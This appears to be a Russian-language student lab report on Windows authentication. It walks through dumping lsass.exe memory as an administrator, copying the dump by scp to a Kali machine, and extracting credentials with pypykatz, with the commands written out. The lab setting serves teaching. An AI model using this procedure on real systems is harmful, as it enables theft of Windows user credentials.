###### tags: `Windows` # Отчет по заданиям к практической работе №3 ААА в Windows: ### 1) Проанализировать память процесса lsass.exe + Зайдём под учетной записью Ольги. ![](https://i.imgur.com/k1WiI4m.png =500x) + Первичная настройка пользователя системы. ![](https://i.imgur.com/31JzwPA.png =500x) + Обращаемся к ресурсам домена. ![](https://i.imgur.com/PVKF6GT.png =500x) + Cменим пользователя на Петра. ![](https://i.imgur.com/Dc9x6if.png =500x) + Первичная настройка пользователя системы. ![](https://i.imgur.com/31JzwPA.png =500x) + Запустим командную строку от имени администратора. ![](https://i.imgur.com/icI225u.png =500x) + Так как Petr не является администратором PC1, введем данные ADMPetr. ![](https://i.imgur.com/krldXts.png =500x) + Введём команду whoami, чтобы проверить, кто мы. ![](https://i.imgur.com/TLTnazW.png =500x) + Теперь запустим диспетчер задач от имени администратора(ADMPetr). ![](https://i.imgur.com/m9Cpfiu.png =500x) + Откроем подробное представление, перейдём в подробности и найдём процесс lsass.exe. ![](https://i.imgur.com/avtt3F2.png =500x) + Cоздаем дамп через "ПКМ - Создать файл дампа". ![](https://i.imgur.com/wptk81A.png =500x) + Расположение дампа находится по адресу: >C:\Users\ADMPetr\AppData\Local\Temp\lsass.DMP ![](https://i.imgur.com/3wmw5jK.png =500x) + Теперь используем Kali Linux, чтобы включить ssh и передать файл. Откроем консоль и включим root-права. > sudo -i ![](https://i.imgur.com/n7wNAXX.png =500x) + Далее зададим нашей машине на Kali Linux статический IP-адрес в нашей локальной сети и тип подключения: "Внутренняя сеть" ![](https://i.imgur.com/0GaqHqO.png =500x) ![](https://i.imgur.com/LJ9pD1V.png =500x) + Включаем сервис SSH. ![](https://i.imgur.com/ZrA3xTR.png =500x) + Вернёмся в Win10 и передадим файл на Kali-машину. > scp C:\Users\ADMpetr\AppData\Local\Temp\lsass.DMP ptvadim@192.168.10.9:/home/ptvadim ![](https://i.imgur.com/szzQ9gZ.png) + Файл передан. ![](https://i.imgur.com/A0ogfdS.png =500x) + Cкачаем скрипт pypykatz в директорию /home/ptvadim. Для этого вернем тип подключения NAT, а также конфиг настройки соединения в самом Kali. И склонируем репозиторий с Github. > git clone https://github.com/skelsec/pypykatz ![](https://i.imgur.com/ZKQjPC5.png =500x) ![](https://i.imgur.com/ekguXin.png =500x) ![](https://i.imgur.com/w8lzpw1.png =500x) + Перейдём в директорию pypycatz и выполним скрипт, применив его к скачанному ранее дампу. > pypykatz lsa minidump /home/ptvadim/lsass.DMP ![](https://i.imgur.com/wzs4Vnj.png =500x) + Увидим учетные данные, которые скрипт достал из процесса lsass. ![](https://i.imgur.com/gjMvFfO.png =2000x)